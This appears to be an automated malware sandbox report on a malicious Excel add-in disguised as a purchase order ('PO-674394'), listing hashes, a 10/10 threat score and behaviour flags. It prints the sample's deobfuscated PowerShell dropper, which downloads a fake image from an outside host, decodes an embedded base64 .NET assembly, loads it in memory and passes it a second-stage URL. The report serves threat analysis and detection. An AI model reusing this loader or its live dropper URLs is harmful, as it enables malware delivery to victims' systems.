ad6dabfbf9b343f2a04f6cdfbc34411b378212dea73d669cab262564420d6ecb

General

Target

PO-674394.xlam.xlsx
Size

642KB
Sample

231011-hggxpsfe8z
MD5

66013791a9a70b8b6429a842ee029ccd
SHA1

a8c5aaf7a3f794bda85717f264a65075c80a10a1
SHA256

ad6dabfbf9b343f2a04f6cdfbc34411b378212dea73d669cab262564420d6ecb
SHA512

9935eb3e66ccf49d3342c88324c6f838239e68d7e28010b1cb4b73b4db0351d200fdfec67a6d2ee53b14b6e9812b5eefcd004a9ea46bc3f99fd96abea206520f
SSDEEP

12288:Kqs/irVm8pm8UKkayx+Uu1oNR4rdCTflYmWu4K+7ZGGnaZZg9xQ9ar6MnDwI:Bqyg8rovs6WC7Su4K+7OZSnUHMnDl

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

1
$imageurl = "https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937"
2
$webclient = new-object system.net.webclient
3
$imagebytes = $webclient.downloaddata("https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937")
4
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
5
$startflag = "<<BASE64_START>>"
6
$endflag = "<<BASE64_END>>"
7
$startindex = $imagetext.indexof("<<BASE64_START>>")
8
$endindex = $imagetext.indexof("<<BASE64_END>>")
9
$startindex -ge 0 -and $endindex -gt $startindex
10
$startindex = $startflag.length
11
$base64length = $endindex - $startindex
12
$base64command = $imagetext.substring($startindex, $base64length)
13
$commandbytes = [system.convert]::frombase64string($base64command)
14
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
15
$type = $loadedassembly.gettype("Fiber.Home")
16
$method = ($type.getmethod("VAI")).invoke($null, [object[]]"txt.smhogn/25.84.011.97//:ptth", "dfdfd", "dfdf", "dfdf", "dadsa", "de", "cu")
17

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

exe.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

Targets

- Target
  
  PO-674394.xlam.xlsx
- Size
  
  642KB
- MD5
  
  66013791a9a70b8b6429a842ee029ccd
- SHA1
  
  a8c5aaf7a3f794bda85717f264a65075c80a10a1
- SHA256
  
  ad6dabfbf9b343f2a04f6cdfbc34411b378212dea73d669cab262564420d6ecb
- SHA512
  
  9935eb3e66ccf49d3342c88324c6f838239e68d7e28010b1cb4b73b4db0351d200fdfec67a6d2ee53b14b6e9812b5eefcd004a9ea46bc3f99fd96abea206520f
- SSDEEP
  
  12288:Kqs/irVm8pm8UKkayx+Uu1oNR4rdCTflYmWu4K+7ZGGnaZZg9xQ9ar6MnDwI:Bqyg8rovs6WC7Su4K+7OZSnUHMnDl
Score

10^/10
- Blocklisted process makes network request
- Drops file in System32 directory
behavioral1 behavioral2